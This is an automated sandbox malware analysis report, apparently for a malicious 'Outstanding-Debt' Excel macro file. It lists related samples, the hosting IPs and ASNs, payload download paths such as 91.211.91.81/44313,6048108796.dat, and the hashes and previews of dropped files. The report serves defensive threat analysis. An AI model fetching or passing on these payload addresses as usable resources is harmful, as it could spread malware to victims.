                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 40.88.32.150, 20.82.210.154, 104.43.193.48, 92.122.145.220, 52.255.188.83, 52.109.20.75, 52.109.76.33, 52.109.76.34, 23.57.80.111, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 20.54.26.129
                                                                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, blobcollector.events.data.trafficmanager.net
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/404155/sample/Outstanding-Debt-71778964-05042021.xlsm

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                91.211.91.81Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-71778964-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81/44313,6048108796.dat
                                                                                                                                                5.34.179.36Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-71778964-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36/44313,6048108796.dat

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                GREENFLOID-ASUAOutstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-71778964-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 5.34.179.36
                                                                                                                                                tetup.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.181.174.176
                                                                                                                                                HOSTFORYUAOutstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-71778964-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 91.211.91.81
                                                                                                                                                Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 2.56.244.189
                                                                                                                                                VOLIA-ASUAOutstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-71778964-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-764934899-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-996801315-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-170373600-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-1754918061-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-439798376-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                Outstanding-Debt-1636503299-05042021.xlsmGet hashmaliciousBrowse
                                                                                                                                                • 45.153.229.23
                                                                                                                                                7D1E.exeGet hashmaliciousBrowse
                                                                                                                                                • 77.123.139.190

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D47D16E7-9A16-4855-BDA9-1C37DDB21F3A
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):134558
                                                                                                                                                Entropy (8bit):5.368390080038868
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:RcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:uEQ9DQW+zPXO8
                                                                                                                                                MD5:6CBAAD565B11D337AA1BFD80182020EF
                                                                                                                                                SHA1:B365E6B4A0CD71A93BCD6F5ABC35456E47732B9C
                                                                                                                                                SHA-256:DFABBEF4BAE3ECD5D2A4478470CA1E56B7B1BB11FFE59C6D2B4A175BDD17DD0D
                                                                                                                                                SHA-512:3C42C6B598CED5BECAFF3C0AE2BE28529DB2F953BFAAF8A34D38FB488811E2476314C55157A0CE388ED53A6AB049889ECD7F81D8109CE7848F838BFD9178E874
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T17:05:14">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B0B63ACE.jpg
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92379
                                                                                                                                                Entropy (8bit):7.654577060340879
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
                                                                                                                                                MD5:4A425E6A5A885C0D0E2589506FD2244B
                                                                                                                                                SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
                                                                                                                                                SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
                                                                                                                                                SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
                                                                                                                                                C:\Users\user\AppData\Local\Temp\9DC10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119850
                                                                                                                                                Entropy (8bit):7.698420605852815
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:XTyb7v8vvKINbjvw548LMb/oqKO8NnS8+60Kcre:Xu70KAbT648LM7D98Np+EEe
                                                                                                                                                MD5:1DA7EF76CBFC710659320C69E3ED7999
                                                                                                                                                SHA1:4CA06310D5E22404C181BC832E20A9D63EFAA760
                                                                                                                                                SHA-256:3B62AAD82F675689779BF6CD0B3C7D635AD1CF9A56A9016E4B3C387EECB84CE0
                                                                                                                                                SHA-512:E57328F023B673762BFA00D4B713F481521E038DD00B64B4C9CF1F9CB753EB5E0C913E20D58FA7BFC0649B32EA561FB51C9CD0620AEC3463375BD8514CE50BCD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):170164
                                                                                                                                                Entropy (8bit):4.3648836344300594
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:f8e/nhLzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:f8ePhg8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                                                MD5:02D38DC389500B3FB8099FC93BB2639F
                                                                                                                                                SHA1:B750968ACB94F0A8F6B2A96740124B31F28870A6
                                                                                                                                                SHA-256:69B4EABFC741EC40E82FCEFB10F827B47036AC42215493AF990B96AFA1474222
                                                                                                                                                SHA-512:6B8A523DB0756B072CEF1A9CD4584C6A89EC868C9544E813719C93FB12257C976C54369B5B7CC9BE98B16B3442EA003D58CC0C49E834AC3241E98FD3772369EF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Wed May 5 01:05:19 2021, atime=Wed May 5 01:05:19 2021, length=8192, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):909
                                                                                                                                                Entropy (8bit):4.684848536353445
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:85yJRUdp6CHiXOS/5GXrDSGzA+W+jA0/y1bDy3/LkeGLkeM4t2Y+xIBjKZm:85QyB/rA0KJDy317aB6m
                                                                                                                                                MD5:216D8A91434F51E7150476118348A698
                                                                                                                                                SHA1:2F9ACFAFFB88F0B8C21AFAE2D6FE3831BC5868F6
                                                                                                                                                SHA-256:7C3AACE271F8B3FF8C03864B0EC603801FA207E6ECEB600D969928D89E1783BC
                                                                                                                                                SHA-512:8FDC948A4261DB9A4F37A2DB48B4F69C270E3157C2BD97CE7E3ED183181E8F0F118B7E91C58C53AE0419E66FADDC8D30C845D6C8D06E803A9BD7356429B0223F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F............-....s.SA..owq.SA... ......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S....................).a.a.l.f.o.n.s.....~.1......R....Desktop.h.......NM..R.......Y..............>.......I.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......325494...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-71778964-05042021.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:09 2020, mtime=Wed May 5 01:05:19 2021, atime=Wed May 5 01:05:19 2021, length=119841, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2370
                                                                                                                                                Entropy (8bit):4.718136050294478
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:8EIqB7T/5h8Ki35iB6pEIqB7T/5h8Ki35iB6:8vu/5vi35iKvu/5vi35i
                                                                                                                                                MD5:8E4D97628E87A4E9DE37BBFFC26B42F4
                                                                                                                                                SHA1:304ABF656F8F7CCDE602C29129A67CAB3DC837A8
                                                                                                                                                SHA-256:6A7A8CE8CED172AE4735586C82851395D55992662AEF7DDF9169E273C4719E51
                                                                                                                                                SHA-512:1BA3D844D5519A8A35F679EB3C9973EBB8AACABAAC3DA4AAFDB722EFC6A87D676DF26B061EA86F7741F45228E60464BC5264833CF11F20ADD949291ABB50DA89
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ...X..8.....{.SA..~.x.SA..!............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S....................).a.a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>.....3}..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .OUTSTA~1.XLS.........>Q.u.R......f.....................J.^.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.7.1.7.7.8.9.6.4.-.0.5.0.4.2.0.2.1...x.l.s.m.......n...............-.......m...........>.S......C:\Users\user\Desktop\Outstanding-Debt-71778964-05042021.xlsm..>.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.7.1.7.7.8.9.6.4.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...Aw...`.......X.......325494...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):157
                                                                                                                                                Entropy (8bit):4.937228469674877
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomxWhl2BdmeTRoQVRXVK6lyEW92BdmeTRoQVRXVK6lmxWhl2BdmeTRoQVRXr:djSl/eTRoi7W9/eTRoi/l/eTRoi1
                                                                                                                                                MD5:683442FC3BF5E8A3E13273B05CE88F11
                                                                                                                                                SHA1:54A91648A3C9962F42651771B16DFDF2BC17DCF9
                                                                                                                                                SHA-256:52A36727E0B670238053CAA7AFFBABBFB10F00CD16595BBDF630D79967DEE317
                                                                                                                                                SHA-512:82809EF76DB296DCAAA0FB54527CB8ADD5117DF461AF2749D1A6B8DD5EC2701D4C7AF579EA09E6624F231E30346AAA1FF9D5D4EB46EB82F962BB4C5F1E90AA0D
                                                                                                                                                Malicious:false
